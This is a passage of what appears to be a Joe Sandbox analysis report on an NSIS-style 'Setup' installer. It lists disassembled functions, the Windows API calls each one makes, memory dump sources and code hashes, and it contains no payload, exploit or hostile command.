                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                        • API String ID: 4283519449-527102705
                                                                                                                                        • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                        • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                        • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                        • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(00445D80,00427976,759223A0,00000000), ref: 00404FD6
                                                                                                                                        • lstrlenW.KERNEL32(004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FE6
                                                                                                                                        • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FF9
                                                                                                                                        • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406902
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2740478559-0
                                                                                                                                        • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                        • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                        • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                        • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                        Strings
                                                                                                                                        • <RM>, xrefs: 00402713
                                                                                                                                        • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
                                                                                                                                        • ForbesHarvardKennedyMarchOthers, xrefs: 00402770
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                        • String ID: <RM>$ForbesHarvardKennedyMarchOthers$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                        • API String ID: 247603264-3860356937
                                                                                                                                        • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                        • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                        • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                        • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 750 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 761 402223-4030f2 call 4062cf 750->761 762 40220d-40221b call 4062cf 750->762 762->761
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,759223A0,00000000), ref: 00404FD6
                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FE6
                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FF9
                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        Strings
                                                                                                                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                        • API String ID: 3156913733-2180253247
                                                                                                                                        • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                        • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                        • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                        • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 770 405eab-405eb7 771 405eb8-405eec GetTickCount GetTempFileNameW 770->771 772 405efb-405efd 771->772 773 405eee-405ef0 771->773 775 405ef5-405ef8 772->775 773->771 774 405ef2 773->774 774->775
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountFileNameTempTick
                                                                                                                                        • String ID: nsa
                                                                                                                                        • API String ID: 1716503409-2209301699
                                                                                                                                        • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                        • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                        • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                        • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 776 402175-40218b call 401446 * 2 781 402198-40219d 776->781 782 40218d-402197 call 4062cf 776->782 783 4021aa-4021b0 EnableWindow 781->783 784 40219f-4021a5 ShowWindow 781->784 782->781 786 4030e3-4030f2 783->786 784->786
                                                                                                                                        APIs
                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                        • String ID: HideWindow
                                                                                                                                        • API String ID: 1249568736-780306582
                                                                                                                                        • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                        • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                        • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                        • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                        APIs
                                                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                        • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                        • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                        • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                        • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$AttributesCreate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 415043291-0
                                                                                                                                        • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                        • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                        • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                        • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                        • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                        • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                        • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                        APIs
                                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                        • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                        • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                        • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                        • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                        • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4115351271-0
                                                                                                                                        • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                        • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                        • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                        • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                        • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                        • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                        • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                        • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                        APIs
